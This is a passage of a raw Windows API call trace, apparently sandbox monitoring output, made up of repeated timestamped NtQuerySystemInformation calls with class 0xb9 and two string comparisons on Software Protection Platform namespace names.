(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x20, ResultLength=0x0) [0208.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x50, ResultLength=0x0) [0208.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x50, ResultLength=0x0) [0208.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x50, ResultLength=0x0) [0208.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0208.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0208.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0208.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0208.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0208.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0208.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0208.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0208.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0208.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0208.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0208.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0208.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x20, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x20, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x50, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x50, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x50, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0208.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0208.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0208.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0208.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0208.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0208.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0208.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0208.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0208.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0208.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0208.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x20, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x20, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0208.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd350, Length=0x28, ResultLength=0x0) [0208.057] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0208.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0208.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0208.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0208.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0208.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0208.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0208.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x28, ResultLength=0x0) [0208.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0208.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0208.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0208.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0208.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0208.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd500, Length=0x40, ResultLength=0x0) [0208.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd460, Length=0x40, ResultLength=0x0) [0208.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd460, Length=0x40, ResultLength=0x0) [0208.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x30, ResultLength=0x0) [0208.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x30, ResultLength=0x0) [0208.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd288, Length=0x30, ResultLength=0x0) [0208.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x38, ResultLength=0x0) [0208.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0208.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0208.073] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0208.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0208.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0208.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0208.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0208.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0208.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0208.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x28, ResultLength=0x0) [0208.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0208.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0208.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.081] 